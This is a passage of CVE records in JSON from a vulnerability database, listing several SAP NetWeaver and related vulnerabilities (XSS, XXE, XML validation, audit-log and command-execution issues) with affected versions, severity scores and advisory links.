"url": "https://launchpad.support.sap.com/#/notes/2644279"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=499356993"
},
{
"name": "105326",
"tags": [
"vdb-entry",
"x_refsource_BID"
],
"url": "http://www.securityfocus.com/bid/105326"
}
],
"source": {
"discovery": "UNKNOWN"
},
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cna@sap.com",
"ID": "CVE-2018-2462",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "SAP NetWeaver BI",
"version": {
"version_data": [
{
"version_name": "=",
"version_value": "7.30"
},
{
"version_name": "=",
"version_value": "7.31"
},
{
"version_name": "=",
"version_value": "7.40"
},
{
"version_name": "=",
"version_value": "7.41"
},
{
"version_name": "=",
"version_value": "7.50"
}
]
}
}
]
},
"vendor_name": "SAP"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "In certain cases, BEx Web Java Runtime Export Web Service in SAP NetWeaver BI 7.30, 7.31. 7.40, 7.41, 7.50, does not sufficiently validate an XML document accepted from an untrusted source."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "XML Validation"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://launchpad.support.sap.com/#/notes/2644279",
"refsource": "MISC",
"url": "https://launchpad.support.sap.com/#/notes/2644279"
},
{
"name": "https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=499356993",
"refsource": "CONFIRM",
"url": "https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=499356993"
},
{
"name": "105326",
"refsource": "BID",
"url": "http://www.securityfocus.com/bid/105326"
}
]
},
"source": {
"discovery": "UNKNOWN"
}
}
}
},
"cveMetadata": {
"assignerOrgId": "e4686d1a-f260-4930-ac4c-2f5c992778dd",
"assignerShortName": "sap",
"cveId": "CVE-2018-2462",
"datePublished": "2018-09-11T15:00:00",
"dateReserved": "2017-12-15T00:00:00",
"dateUpdated": "2024-08-05T04:21:33.906Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2015-2107
Vulnerability from cvelistv5
Published
2015-03-14 01:00
Modified
2024-08-06 05:02
Severity ?
EPSS score ?
Summary
HP Operations Manager i Management Pack 1.x before 1.01 for SAP allows local users to execute OS commands by leveraging SAP administrative privileges.
References
| ▼ | URL | Tags |
|---|---|---|
| http://h20564.www2.hp.com/hpsc/doc/public/display?docId=emr_na-c04588084 | vendor-advisory, x_refsource_HP | |
| http://h20564.www2.hp.com/hpsc/doc/public/display?docId=emr_na-c04588084 | vendor-advisory, x_refsource_HP | |
| http://www.securitytracker.com/id/1031870 | vdb-entry, x_refsource_SECTRACK |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-06T05:02:43.453Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "HPSBGN03284",
"tags": [
"vendor-advisory",
"x_refsource_HP",
"x_transferred"
],
"url": "http://h20564.www2.hp.com/hpsc/doc/public/display?docId=emr_na-c04588084"
},
{
"name": "SSRT101971",
"tags": [
"vendor-advisory",
"x_refsource_HP",
"x_transferred"
],
"url": "http://h20564.www2.hp.com/hpsc/doc/public/display?docId=emr_na-c04588084"
},
{
"name": "1031870",
"tags": [
"vdb-entry",
"x_refsource_SECTRACK",
"x_transferred"
],
"url": "http://www.securitytracker.com/id/1031870"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2015-03-09T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "HP Operations Manager i Management Pack 1.x before 1.01 for SAP allows local users to execute OS commands by leveraging SAP administrative privileges."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2015-03-17T17:57:01",
"orgId": "74586083-13ce-40fd-b46a-8e5d23cfbcb2",
"shortName": "hp"
},
"references": [
{
"name": "HPSBGN03284",
"tags": [
"vendor-advisory",
"x_refsource_HP"
],
"url": "http://h20564.www2.hp.com/hpsc/doc/public/display?docId=emr_na-c04588084"
},
{
"name": "SSRT101971",
"tags": [
"vendor-advisory",
"x_refsource_HP"
],
"url": "http://h20564.www2.hp.com/hpsc/doc/public/display?docId=emr_na-c04588084"
},
{
"name": "1031870",
"tags": [
"vdb-entry",
"x_refsource_SECTRACK"
],
"url": "http://www.securitytracker.com/id/1031870"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "hp-security-alert@hp.com",
"ID": "CVE-2015-2107",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "HP Operations Manager i Management Pack 1.x before 1.01 for SAP allows local users to execute OS commands by leveraging SAP administrative privileges."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "HPSBGN03284",
"refsource": "HP",
"url": "http://h20564.www2.hp.com/hpsc/doc/public/display?docId=emr_na-c04588084"
},
{
"name": "SSRT101971",
"refsource": "HP",
"url": "http://h20564.www2.hp.com/hpsc/doc/public/display?docId=emr_na-c04588084"
},
{
"name": "1031870",
"refsource": "SECTRACK",
"url": "http://www.securitytracker.com/id/1031870"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "74586083-13ce-40fd-b46a-8e5d23cfbcb2",
"assignerShortName": "hp",
"cveId": "CVE-2015-2107",
"datePublished": "2015-03-14T01:00:00",
"dateReserved": "2015-02-27T00:00:00",
"dateUpdated": "2024-08-06T05:02:43.453Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2016-4014
Vulnerability from cvelistv5
Published
2016-04-14 14:00
Modified
2024-08-06 00:17
Severity ?
EPSS score ?
Summary
XML external entity (XXE) vulnerability in the UDDI component in SAP NetWeaver JAVA AS 7.4 allows remote attackers to cause a denial of service (system hang) via a crafted DTD in an XML request to uddi/api/replication, aka SAP Security Note 2254389.
References
| ▼ | URL | Tags |
|---|---|---|
| https://erpscan.io/press-center/blog/dos-vulnerabilities-on-the-rise-sap-security-notes-april-2016/ | x_refsource_MISC | |
| http://seclists.org/fulldisclosure/2016/Jul/45 | mailing-list, x_refsource_FULLDISC | |
| https://erpscan.io/advisories/erpscan-16-020-sap-netweaver-java-uddi-component-xxe-vulnerability/ | x_refsource_MISC | |
| http://packetstormsecurity.com/files/137919/SAP-NetWeaver-AS-JAVA-7.4-XXE-Injection.html | x_refsource_MISC |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-06T00:17:30.546Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://erpscan.io/press-center/blog/dos-vulnerabilities-on-the-rise-sap-security-notes-april-2016/"
},
{
"name": "20160715 [ERPSCAN-16-020] SAP NetWeaver AS JAVA UDDI component - XXE vulnerability",
"tags": [
"mailing-list",
"x_refsource_FULLDISC",
"x_transferred"
],
"url": "http://seclists.org/fulldisclosure/2016/Jul/45"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://erpscan.io/advisories/erpscan-16-020-sap-netweaver-java-uddi-component-xxe-vulnerability/"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://packetstormsecurity.com/files/137919/SAP-NetWeaver-AS-JAVA-7.4-XXE-Injection.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2016-04-12T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "XML external entity (XXE) vulnerability in the UDDI component in SAP NetWeaver JAVA AS 7.4 allows remote attackers to cause a denial of service (system hang) via a crafted DTD in an XML request to uddi/api/replication, aka SAP Security Note 2254389."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2018-12-10T17:57:01",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "https://erpscan.io/press-center/blog/dos-vulnerabilities-on-the-rise-sap-security-notes-april-2016/"
},
{
"name": "20160715 [ERPSCAN-16-020] SAP NetWeaver AS JAVA UDDI component - XXE vulnerability",
"tags": [
"mailing-list",
"x_refsource_FULLDISC"
],
"url": "http://seclists.org/fulldisclosure/2016/Jul/45"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://erpscan.io/advisories/erpscan-16-020-sap-netweaver-java-uddi-component-xxe-vulnerability/"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://packetstormsecurity.com/files/137919/SAP-NetWeaver-AS-JAVA-7.4-XXE-Injection.html"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2016-4014",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "XML external entity (XXE) vulnerability in the UDDI component in SAP NetWeaver JAVA AS 7.4 allows remote attackers to cause a denial of service (system hang) via a crafted DTD in an XML request to uddi/api/replication, aka SAP Security Note 2254389."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://erpscan.io/press-center/blog/dos-vulnerabilities-on-the-rise-sap-security-notes-april-2016/",
"refsource": "MISC",
"url": "https://erpscan.io/press-center/blog/dos-vulnerabilities-on-the-rise-sap-security-notes-april-2016/"
},
{
"name": "20160715 [ERPSCAN-16-020] SAP NetWeaver AS JAVA UDDI component - XXE vulnerability",
"refsource": "FULLDISC",
"url": "http://seclists.org/fulldisclosure/2016/Jul/45"
},
{
"name": "https://erpscan.io/advisories/erpscan-16-020-sap-netweaver-java-uddi-component-xxe-vulnerability/",
"refsource": "MISC",
"url": "https://erpscan.io/advisories/erpscan-16-020-sap-netweaver-java-uddi-component-xxe-vulnerability/"
},
{
"name": "http://packetstormsecurity.com/files/137919/SAP-NetWeaver-AS-JAVA-7.4-XXE-Injection.html",
"refsource": "MISC",
"url": "http://packetstormsecurity.com/files/137919/SAP-NetWeaver-AS-JAVA-7.4-XXE-Injection.html"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2016-4014",
"datePublished": "2016-04-14T14:00:00",
"dateReserved": "2016-04-14T00:00:00",
"dateUpdated": "2024-08-06T00:17:30.546Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2023-33985
Vulnerability from cvelistv5
Published
2023-06-13 02:45
Modified
2025-01-03 02:03
Severity ?
EPSS score ?
Summary
SAP NetWeaver Enterprise Portal - version 7.50, does not sufficiently encode user-controlled inputs over the network, resulting in reflected Cross-Site Scripting (XSS) vulnerability, therefore changing the scope of the attack. On successful exploitation, an attacker can view or modify information causing a limited impact on confidentiality and integrity of the application.
References
Impacted products
| Vendor | Product | Version | |
|---|---|---|---|
| ▼ | SAP_SE | SAP NetWeaver Enterprise Portal |
Version: 7.50 |
|
|
|||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T15:54:14.116Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://launchpad.support.sap.com/#/notes/3331627"
},
{
"tags": [
"x_transferred"
],
"url": "https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2023-33985",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "yes"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-01-03T02:03:24.666279Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2025-01-03T02:03:37.185Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "SAP NetWeaver Enterprise Portal",
"vendor": "SAP_SE",
"versions": [
{
"status": "affected",
"version": "7.50"
}
]
}
],
"descriptions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "\u003cp\u003eSAP NetWeaver Enterprise Portal - version 7.50, does not sufficiently encode user-controlled inputs over the network, resulting in reflected Cross-Site Scripting (XSS) vulnerability, therefore changing the scope of the attack. On successful exploitation, an attacker can view or modify information causing a limited impact on confidentiality and integrity of the application.\u003c/p\u003e"
}
],
"value": "SAP NetWeaver Enterprise Portal - version 7.50, does not sufficiently encode user-controlled inputs over the network, resulting in reflected Cross-Site Scripting (XSS) vulnerability, therefore changing the scope of the attack. On successful exploitation, an attacker can view or modify information causing a limited impact on confidentiality and integrity of the application.\n\n"
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"format": "CVSS",
"scenarios": [
{
"lang": "en",
"value": "GENERAL"
}
]
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-79",
"description": "CWE-79: Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)",
"lang": "eng",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2023-06-13T02:45:00.752Z",
"orgId": "e4686d1a-f260-4930-ac4c-2f5c992778dd",
"shortName": "sap"
},
"references": [
{
"url": "https://launchpad.support.sap.com/#/notes/3331627"
},
{
"url": "https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html"
}
],
"source": {
"discovery": "UNKNOWN"
},
"title": "Cross-Site Scripting (XSS) vulnerability in SAP NetWeaver Enterprise Portal",
"x_generator": {
"engine": "Vulnogram 0.1.0-dev"
}
}
},
"cveMetadata": {
"assignerOrgId": "e4686d1a-f260-4930-ac4c-2f5c992778dd",
"assignerShortName": "sap",
"cveId": "CVE-2023-33985",
"datePublished": "2023-06-13T02:45:00.752Z",
"dateReserved": "2023-05-24T20:41:32.834Z",
"dateUpdated": "2025-01-03T02:03:37.185Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2018-2464
Vulnerability from cvelistv5
Published
2018-09-11 15:00
Modified
2024-08-05 04:21
Severity ?
EPSS score ?
Summary
SAP WebDynpro Java, versions 7.20, 7.30, 7.31, 7.40, 7.50, does not sufficiently encode user-controlled inputs, resulting in a stored Cross-Site Scripting (XSS) vulnerability.
References
| ▼ | URL | Tags |
|---|---|---|
| https://launchpad.support.sap.com/#/notes/2679378 | x_refsource_MISC | |
| https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=499356993 | x_refsource_CONFIRM | |
| http://www.securityfocus.com/bid/105308 | vdb-entry, x_refsource_BID |
Impacted products
| Vendor | Product | Version | |
|---|---|---|---|
| ▼ | SAP | SAP WebDynpro |
Version: = 7.20 Version: = 7.30 Version: = 7.31 Version: = 7.40 Version: = 7.50 |
|
|
|||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-05T04:21:34.168Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://launchpad.support.sap.com/#/notes/2679378"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=499356993"
},
{
"name": "105308",
"tags": [
"vdb-entry",
"x_refsource_BID",
"x_transferred"
],
"url": "http://www.securityfocus.com/bid/105308"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "SAP WebDynpro",
"vendor": "SAP",
"versions": [
{
"status": "affected",
"version": "= 7.20"
},
{
"status": "affected",
"version": "= 7.30"
},
{
"status": "affected",
"version": "= 7.31"
},
{
"status": "affected",
"version": "= 7.40"
},
{
"status": "affected",
"version": "= 7.50"
}
]
}
],
"datePublic": "2018-09-11T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "SAP WebDynpro Java, versions 7.20, 7.30, 7.31, 7.40, 7.50, does not sufficiently encode user-controlled inputs, resulting in a stored Cross-Site Scripting (XSS) vulnerability."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "Cross-Site Scripting",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2018-09-12T09:57:01",
"orgId": "e4686d1a-f260-4930-ac4c-2f5c992778dd",
"shortName": "sap"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "https://launchpad.support.sap.com/#/notes/2679378"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=499356993"
},
{
"name": "105308",
"tags": [
"vdb-entry",
"x_refsource_BID"
],
"url": "http://www.securityfocus.com/bid/105308"
}
],
"source": {
"discovery": "UNKNOWN"
},
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cna@sap.com",
"ID": "CVE-2018-2464",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "SAP WebDynpro",
"version": {
"version_data": [
{
"version_name": "=",
"version_value": "7.20"
},
{
"version_name": "=",
"version_value": "7.30"
},
{
"version_name": "=",
"version_value": "7.31"
},
{
"version_name": "=",
"version_value": "7.40"
},
{
"version_name": "=",
"version_value": "7.50"
}
]
}
}
]
},
"vendor_name": "SAP"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "SAP WebDynpro Java, versions 7.20, 7.30, 7.31, 7.40, 7.50, does not sufficiently encode user-controlled inputs, resulting in a stored Cross-Site Scripting (XSS) vulnerability."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "Cross-Site Scripting"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://launchpad.support.sap.com/#/notes/2679378",
"refsource": "MISC",
"url": "https://launchpad.support.sap.com/#/notes/2679378"
},
{
"name": "https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=499356993",
"refsource": "CONFIRM",
"url": "https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=499356993"
},
{
"name": "105308",
"refsource": "BID",
"url": "http://www.securityfocus.com/bid/105308"
}
]
},
"source": {
"discovery": "UNKNOWN"
}
}
}
},
"cveMetadata": {
"assignerOrgId": "e4686d1a-f260-4930-ac4c-2f5c992778dd",
"assignerShortName": "sap",
"cveId": "CVE-2018-2464",
"datePublished": "2018-09-11T15:00:00",
"dateReserved": "2017-12-15T00:00:00",
"dateUpdated": "2024-08-05T04:21:34.168Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2011-5260
Vulnerability from cvelistv5
Published
2013-02-12 20:00
Modified
2024-08-07 00:30
Severity ?
EPSS score ?
Summary
Cross-site scripting (XSS) vulnerability in SAP/BW/DOC/METADATA in SAP NetWeaver allows remote attackers to inject arbitrary web script or HTML via the page parameter.
References
| ▼ | URL | Tags |
|---|---|---|
| https://erpscan.io/advisories/dsecrg-11-037-sap-bw-doc-multiple-xss/ | x_refsource_MISC | |
| http://dsecrg.com/pages/vul/show.php?id=337 | x_refsource_MISC | |
| http://www.securityfocus.com/archive/1/520555/100/0/threaded | mailing-list, x_refsource_BUGTRAQ | |
| http://www.sdn.sap.com/irj/scn/index?rid=/webcontent/uuid/50316177-762d-2f10-0993-a2206cc349b4 | x_refsource_CONFIRM |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-07T00:30:46.851Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://erpscan.io/advisories/dsecrg-11-037-sap-bw-doc-multiple-xss/"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://dsecrg.com/pages/vul/show.php?id=337"
},
{
"name": "20111117 [DSECRG-11-037] SAP BW Doc - Multiple XSS",
"tags": [
"mailing-list",
"x_refsource_BUGTRAQ",
"x_transferred"
],
"url": "http://www.securityfocus.com/archive/1/520555/100/0/threaded"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "http://www.sdn.sap.com/irj/scn/index?rid=/webcontent/uuid/50316177-762d-2f10-0993-a2206cc349b4"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2011-11-17T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "Cross-site scripting (XSS) vulnerability in SAP/BW/DOC/METADATA in SAP NetWeaver allows remote attackers to inject arbitrary web script or HTML via the page parameter."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2018-12-10T17:57:01",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "https://erpscan.io/advisories/dsecrg-11-037-sap-bw-doc-multiple-xss/"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://dsecrg.com/pages/vul/show.php?id=337"
},
{
"name": "20111117 [DSECRG-11-037] SAP BW Doc - Multiple XSS",
"tags": [
"mailing-list",
"x_refsource_BUGTRAQ"
],
"url": "http://www.securityfocus.com/archive/1/520555/100/0/threaded"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "http://www.sdn.sap.com/irj/scn/index?rid=/webcontent/uuid/50316177-762d-2f10-0993-a2206cc349b4"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2011-5260",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Cross-site scripting (XSS) vulnerability in SAP/BW/DOC/METADATA in SAP NetWeaver allows remote attackers to inject arbitrary web script or HTML via the page parameter."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://erpscan.io/advisories/dsecrg-11-037-sap-bw-doc-multiple-xss/",
"refsource": "MISC",
"url": "https://erpscan.io/advisories/dsecrg-11-037-sap-bw-doc-multiple-xss/"
},
{
"name": "http://dsecrg.com/pages/vul/show.php?id=337",
"refsource": "MISC",
"url": "http://dsecrg.com/pages/vul/show.php?id=337"
},
{
"name": "20111117 [DSECRG-11-037] SAP BW Doc - Multiple XSS",
"refsource": "BUGTRAQ",
"url": "http://www.securityfocus.com/archive/1/520555/100/0/threaded"
},
{
"name": "http://www.sdn.sap.com/irj/scn/index?rid=/webcontent/uuid/50316177-762d-2f10-0993-a2206cc349b4",
"refsource": "CONFIRM",
"url": "http://www.sdn.sap.com/irj/scn/index?rid=/webcontent/uuid/50316177-762d-2f10-0993-a2206cc349b4"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2011-5260",
"datePublished": "2013-02-12T20:00:00",
"dateReserved": "2013-02-12T00:00:00",
"dateUpdated": "2024-08-07T00:30:46.851Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2016-7437
Vulnerability from cvelistv5
Published
2016-10-13 14:00
Modified
2024-08-06 01:57
Severity ?
EPSS score ?
Summary
SAP Netweaver 7.40 improperly logs (1) DUI and (2) DUJ events in the SAP Security Audit Log as non-critical, which might allow local users to hide rejected attempts to execute RFC function callbacks by leveraging filtering of non-critical events in audit analysis reports, aka SAP Security Note 2252312.
References
| ▼ | URL | Tags |
|---|---|---|
| http://www.securityfocus.com/bid/93503 | vdb-entry, x_refsource_BID | |
| https://www.onapsis.com/research/security-advisories/sap-business-objects-memory-corruption-0 | x_refsource_MISC | |
| http://seclists.org/fulldisclosure/2016/Oct/53 | mailing-list, x_refsource_FULLDISC |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-06T01:57:47.627Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "93503",
"tags": [
"vdb-entry",
"x_refsource_BID",
"x_transferred"
],
"url": "http://www.securityfocus.com/bid/93503"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://www.onapsis.com/research/security-advisories/sap-business-objects-memory-corruption-0"
},
{
"name": "20161011 Onapsis Security Advisory ONAPSIS-2016-051: SAP Business Objects Memory Corruption",
"tags": [
"mailing-list",
"x_refsource_FULLDISC",
"x_transferred"
],
"url": "http://seclists.org/fulldisclosure/2016/Oct/53"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2016-09-22T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "SAP Netweaver 7.40 improperly logs (1) DUI and (2) DUJ events in the SAP Security Audit Log as non-critical, which might allow local users to hide rejected attempts to execute RFC function callbacks by leveraging filtering of non-critical events in audit analysis reports, aka SAP Security Note 2252312."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2016-10-13T13:57:01",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"name": "93503",
"tags": [
"vdb-entry",
"x_refsource_BID"
],
"url": "http://www.securityfocus.com/bid/93503"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://www.onapsis.com/research/security-advisories/sap-business-objects-memory-corruption-0"
},
{
"name": "20161011 Onapsis Security Advisory ONAPSIS-2016-051: SAP Business Objects Memory Corruption",
"tags": [
"mailing-list",
"x_refsource_FULLDISC"
],
"url": "http://seclists.org/fulldisclosure/2016/Oct/53"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2016-7437",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "SAP Netweaver 7.40 improperly logs (1) DUI and (2) DUJ events in the SAP Security Audit Log as non-critical, which might allow local users to hide rejected attempts to execute RFC function callbacks by leveraging filtering of non-critical events in audit analysis reports, aka SAP Security Note 2252312."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "93503",
"refsource": "BID",
"url": "http://www.securityfocus.com/bid/93503"
},
{
"name": "https://www.onapsis.com/research/security-advisories/sap-business-objects-memory-corruption-0",
"refsource": "MISC",
"url": "https://www.onapsis.com/research/security-advisories/sap-business-objects-memory-corruption-0"
},
{
"name": "20161011 Onapsis Security Advisory ONAPSIS-2016-051: SAP Business Objects Memory Corruption",
"refsource": "FULLDISC",
"url": "http://seclists.org/fulldisclosure/2016/Oct/53"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2016-7437",
"datePublished": "2016-10-13T14:00:00",
